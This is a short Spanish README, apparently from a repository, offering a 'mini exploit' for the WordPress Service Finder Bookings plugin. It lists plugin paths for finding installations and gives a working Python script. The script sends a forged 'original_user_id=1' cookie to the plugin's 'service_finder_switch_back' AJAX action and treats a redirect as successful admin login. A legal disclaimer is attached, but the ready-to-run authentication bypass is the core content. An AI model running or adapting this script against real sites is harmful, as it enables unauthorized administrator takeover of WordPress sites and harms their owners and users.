
Un mini exploit para el plugin de WordPress Service Finder -Bookings
El plugin Service Finder es un sistema de reservas y gestión de servicios para WordPress.
Debido a su popularidad y complejidad, algunas versiones han tenido problemas de seguridad relacionados con endpoints AJAX no autenticados o controles de acceso inadecuados.
Este README explica cómo los investigadores pueden identificar de forma segura instalaciones y seguir prácticas éticas (dbr krk).
/wp-content/plugins/service-finder/
/wp-content/plugins/service-finder-bookings/
/wp-content/plugins/sf-booking/
⚠️ Aviso legal:
Estas búsquedas son solo para fines educativos y de investigación. No intente nunca accesos no autorizados ni explotación.
import requests
url = "https://example.com/wp-admin/admin-ajax.php?action=service_finder_switch_back"
cookies = {
'original_user_id': '1',
}
r = requests.get(url, cookies=cookies)
print(r.status_code)
print(r.text)
300-399: ✅ ¡VULNERABLE! Redirección al panel de administración como ADMIN400-499: ⚠️ Error de cliente — la solicitud fue inválida o no autorizada, no es vulnerable